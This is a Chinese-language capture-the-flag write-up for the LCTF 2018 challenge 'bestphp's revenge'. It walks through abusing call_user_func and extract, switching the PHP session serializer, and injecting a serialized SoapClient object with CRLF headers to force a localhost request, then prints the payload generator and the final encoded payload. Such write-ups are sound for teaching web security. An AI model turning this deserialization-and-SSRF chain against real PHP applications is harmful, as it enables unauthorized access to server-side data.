[PHP知识库] bestphp‘s revenge SoapClient php处理器反序列化 call_user

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> bestphp‘s revenge SoapClient php处理器反序列化 call_user_func -> 正文阅读

[PHP知识库]bestphp‘s revenge SoapClient php处理器反序列化 call_user_func

bestphp’s revenge
这道题的知识点还挺多的
源码文件有两个：index.php和flag.php

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }

目的是通过127.0.0.1向flag.php发送请求，然后flag.php把flag放到session里。发请求用的是php里的一个内置类：SoapClient，它有魔术方法_call可以构造请求

<?php
$target='http://127.0.0.1/flag.php';
$b = new SoapClient(null,array('location' => $target,
    'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",
    'uri' => "http://127.0.0.1/"))

这里还用到了CRLF，也就是“\r\n”。在http请求中，\r\n用来分隔请求头和请求体，因此Cookie就会被放到请求体当中，等于我们用一个自己构造的SESSID访问了flag.php。
接下来要让SoapClient类被调用。传值f=extract&name=SoapClient POST:b=call_user_func。extract把数组中键的值赋给键的同名变量，也就是把call_user_func赋给了$b。
此时源代码中的最后一行call_user_func($b, $a)就变成了call_user_func(‘call_user_func’,array(‘SoapClient’,’welcome_to_the_lctf2018’))
当call_user_func的第一个参数为数组时，会把第一个值当作类名，第二个值当作方法进行回调。也就是说会调用SoapClient->welcome_to_the_lctf2018’，因为SoapClient没有这个方法就调用_call。
最后要把我们构造的SoapClient类写进去，通过php的反序列化。php有三种处理器对$_SESSION数据进行序列化和反序列化。

php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
php 键名+竖线（|）+经过serialize()函数处理过的值
php_serialize 经过serialize()函数处理过的值，会将键名和值当作一个数组序列化

题目的环境本来是php，但我们可以通过session_start函数把session.serialize_handler改为php_serialize。然后在name里输入构造好的反序列化字符串，加'|'字符，php处理器就会把|后面的字符串都看成键值进行反序列化。

<?php
$target='http://127.0.0.1/flag.php';
$b = new SoapClient(null,array('location' => $target,
    'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",
    'uri' => "http://127.0.0.1/"));

$a = serialize($b);
echo "|".urlencode($a);

得到

|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A31%3A%22npfs%0D%0ACookie%3APHPSESSID%3D123456%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D